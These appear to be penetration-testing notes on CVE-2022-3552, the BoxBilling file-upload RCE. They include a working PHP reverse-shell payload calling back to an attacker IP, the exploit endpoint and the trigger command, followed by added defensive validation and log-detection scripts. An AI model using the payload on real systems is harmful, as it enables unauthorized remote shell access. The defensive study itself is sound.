# BoxBilling

[BoxBilling](https://docs.boxbilling.com/en/latest/index.html) is an open-source web application designed to facilitate automated client management, billing, and support services. Although primarily aimed at web hosting companies, it functions similarly to a lightweight CMS by offering modules for account handling, invoicing, and service provisioning through a web interface. The platform is **PHP-based**, supports integration with various payment gateways, and exposes multiple web-accessible endpoints, some of which interact directly with backend logic and server resources.

## Authenticated File Upload (RCE)

BoxBilling versions up to and including `4.22.1.5` are affected by an **authenticated file upload** vulnerability ([CVE-2022-3552](https://nvd.nist.gov/vuln/detail/CVE-2022-3552)) that **allows administrative users to upload arbitrary files** without any validation or restriction on file type. The flaw resides in a hidden endpoint of the `Filemanager` API, which fails to enforce input sanitization or MIME filtering when writing data to disk. This allows the upload of malicious PHP payloads, **resulting in RCE with web-server privileges** when the uploaded file is accessed via the web server.

A public [PoC](https://x7331.gitbook.io/notes/) is available and works with minimal modification. Socket values (IP and port) must be updated within the reverse shell payload prior to use:

{% code overflow="wrap" %}

```bash
./CVE-2022-3552.py -d http://boxbilling.com -u admin@boxbilling.com -p Passw0rd123!
```

{% endcode %}

The vulnerability can also be exploited manually via a `POST` request to the endpoint:

```
/index.php?_url=/api/admin/Filemanager/save_file
```

The `data` parameter accepts raw PHP content as a string and writes it to a file in the web root. No restrictions are enforced, making it possible to directly implant a web/reverse shell. All double quotes within the payload must be escaped (`\"`), and unnecessary whitespace should be removed to ensure proper parsing. To confirm the upload path, the following endpoint can be queried ([BoxBilling Admin API Docs](https://docs.boxbilling.com/en/latest/reference/api-admin.html#admin-filemanager-get-list)):

```
/index.php?_url=/api/admin/Filemanager/get_list
```
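The checks that `save_file` should have applied before writing `data` to `path`, written as an added reference example in Python (this is not BoxBilling code, which is PHP; each check maps directly onto a PHP handler). The upload base directory `UPLOAD_BASE`, the extension allowlist and the sample requests are assumptions; the first sample only mirrors the shape of the `revshell.php` request shown on this page.

```python
"""Reference validation for a file-manager save_file-style endpoint.

Added example: not BoxBilling code. It shows the checks the vulnerable
Filemanager/save_file handler does not perform before writing `data` to
`path`. UPLOAD_BASE, ALLOWED_EXTENSIONS and the sample requests are
assumptions made for this illustration.
"""
import os
import re

# Assumption: the file manager may only write under this directory, which
# should sit outside the web root (or be served with script execution off).
UPLOAD_BASE = "/var/lib/boxbilling/uploads"

# Assumption: the document/image types the file manager legitimately needs.
ALLOWED_EXTENSIONS = {"txt", "csv", "pdf", "png", "jpg", "jpeg", "gif"}

# Suffixes a web server may hand to a script engine even when they are not
# the final one (e.g. "notes.php.txt" under some Apache mod_mime setups).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# <?php, <?= and the short <? tag followed by whitespace.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)


def validate_path(path, base=UPLOAD_BASE):
    """Return (ok, reason) for a client-supplied relative file path."""
    if not path or "\x00" in path:
        return False, "empty path or NUL byte"
    if path.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", path):
        return False, "absolute path not allowed"
    parts = path.replace("\\", "/").split("/")
    if any(p in ("", ".", "..") for p in parts):
        return False, "empty, '.' or '..' path component"
    suffixes = parts[-1].lower().split(".")[1:]
    if not suffixes:
        return False, "missing extension"
    if suffixes[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension '.{suffixes[-1]}' not in allowlist"
    if any(s in SCRIPT_EXTENSIONS for s in suffixes):
        return False, "script extension present in file name"
    # Confine the resolved target to the base directory; realpath also follows
    # symlinks, so a link planted under the base cannot redirect the write.
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, path))
    if os.path.commonpath([base_real, target]) != base_real:
        return False, "resolved path escapes base directory"
    return True, "ok"


def validate_content(data):
    """Reject content carrying a PHP open tag, whatever the extension says."""
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag found in content"
    return True, "ok"


def check_save_request(request):
    """Validate a {'path': ..., 'data': ...} request before any disk write."""
    data = request.get("data", "")
    if isinstance(data, str):
        data = data.encode("utf-8", "surrogateescape")
    ok, reason = validate_path(request.get("path", ""))
    if not ok:
        return False, reason
    return validate_content(data)


# Constructed requests. The first has the shape of the request shown on this
# page (a .php file name in the web root); the rest exercise the other checks.
SAMPLE_REQUESTS = [
    {"path": "revshell.php", "data": "<?php echo 1; ?>"},
    {"path": "../../var/www/html/x.txt", "data": "harmless"},
    {"path": "notes.php.txt", "data": "harmless"},
    {"path": "invoice.txt", "data": "<?= 1 ?>"},
    {"path": "invoice.txt", "data": "Invoice #1001"},
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req['path']:30} -> {check_save_request(req)}")
```

The path check rejects the request by name alone, the content check catches a PHP open tag hidden behind an allowed extension, and the `realpath` comparison is what stops traversal and symlink tricks that string checks miss; the extension allowlist is the one knob a deployment would tune.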

Example payload (reverse shell), delivered via the API as JSON:

{% code overflow="wrap" %}

```json
{
  "order_id": 1,
  "data": "<?php set_time_limit (0);$VERSION = \"1.0\";$ip = '192.168.45.170';$port = 80;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/bash -i';$daemon = 0;$debug = 0;if (function_exists('pcntl_fork')) {$pid = pcntl_fork();if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {exit(1);}$daemon = 1;}chdir(\"/\");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {exit(1);}$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"),2 => array(\"pipe\", \"w\"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);while (1) {if (feof($sock)) {break;}if (feof($pipes[1])) {break;}$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process); ?>",
  "path": "revshell.php"
}
```

{% endcode %}

Once successfully uploaded, the shell becomes accessible via a browser or CLI:

```bash
curl -s http://boxbilling.com/revshell.php
```
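For defenders, the sequence above leaves a recognisable trail in the web server access log: a `get_list` call, a `save_file` call, then a direct request for a `.php` file that BoxBilling never serves itself (every legitimate URL on this page goes through `/index.php?_url=...`). The following detection script is an added example, not part of the original page or of BoxBilling; the log lines are constructed, and the entry-point allowlist `KNOWN_ENTRYPOINTS` and the correlation window `WINDOW` are assumptions about the deployment.

```python
"""Spot CVE-2022-3552-style Filemanager abuse in web-server access logs.

Added example, not part of the original page or of BoxBilling. The log lines
below are constructed (combined log format); KNOWN_ENTRYPOINTS and WINDOW are
assumptions about the deployment.
"""
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumption: every legitimate request hits the front controller (the page's
# own URLs all look like /index.php?_url=...), so any other directly
# requested .php file is unexpected.
KNOWN_ENTRYPOINTS = {"/index.php", "/"}
FILEMANAGER_SAVE = "/api/admin/filemanager/save_file"
FILEMANAGER_LIST = "/api/admin/filemanager/get_list"
WINDOW = timedelta(minutes=30)  # assumption: correlation window after a save


def parse_line(line):
    """Parse one combined-log-format line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    api_route = ""
    for kv in query.split("&"):
        if kv.lower().startswith("_url="):
            api_route = kv[5:].lower()  # compare routes case-insensitively
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": path, "api_route": api_route,
            "status": int(m["status"])}


def analyse(lines):
    """Return findings as (severity, ip, timestamp, message) tuples."""
    findings = []
    last_save = {}  # ip -> timestamp of that source's latest save_file call
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["api_route"] == FILEMANAGER_LIST:
            findings.append(("low", ev["ip"], ev["ts"], "Filemanager/get_list enumeration"))
        if ev["api_route"] == FILEMANAGER_SAVE:
            last_save[ev["ip"]] = ev["ts"]
            findings.append(("medium", ev["ip"], ev["ts"], "Filemanager/save_file write"))
        if ev["path"].lower().endswith(".php") and ev["path"] not in KNOWN_ENTRYPOINTS:
            sev = "medium"
            msg = f"direct request to unexpected script {ev['path']}"
            saved = last_save.get(ev["ip"])
            if saved is not None and timedelta(0) <= ev["ts"] - saved <= WINDOW:
                sev = "high"
                msg += " shortly after a save_file call from the same source"
            elif ev["status"] != 200:
                sev = "low"  # nothing served: ordinary scanner noise
            findings.append((sev, ev["ip"], ev["ts"], msg))
    return findings


# Constructed sample: an admin session that lists, writes, then fetches a new
# script, followed by unrelated traffic from a second address.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "POST /index.php?_url=/api/admin/login HTTP/1.1" 200 512
203.0.113.7 - - [10/Jan/2024:10:00:05 +0000] "GET /index.php?_url=/api/admin/Filemanager/get_list HTTP/1.1" 200 2048
203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1" 200 64
203.0.113.7 - - [10/Jan/2024:10:00:15 +0000] "GET /revshell.php HTTP/1.1" 200 0
198.51.100.4 - - [10/Jan/2024:11:30:00 +0000] "GET /index.php?_url=/api/guest/invoice/get HTTP/1.1" 200 1400
198.51.100.4 - - [10/Jan/2024:11:30:03 +0000] "GET /wp-login.php HTTP/1.1" 404 210
"""

if __name__ == "__main__":
    for sev, ip, ts, msg in analyse(SAMPLE_LOG.splitlines()):
        print(f"[{sev:6}] {ts.isoformat()} {ip:15} {msg}")
```

In practice the same `analyse` function would be fed from the live access log rather than the embedded sample; the point of the correlation is that a `save_file` call followed by a request for a previously unseen `.php` path from the same source is the actual exploitation signature, while an isolated 404 on a stray `.php` name is just background scanning.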
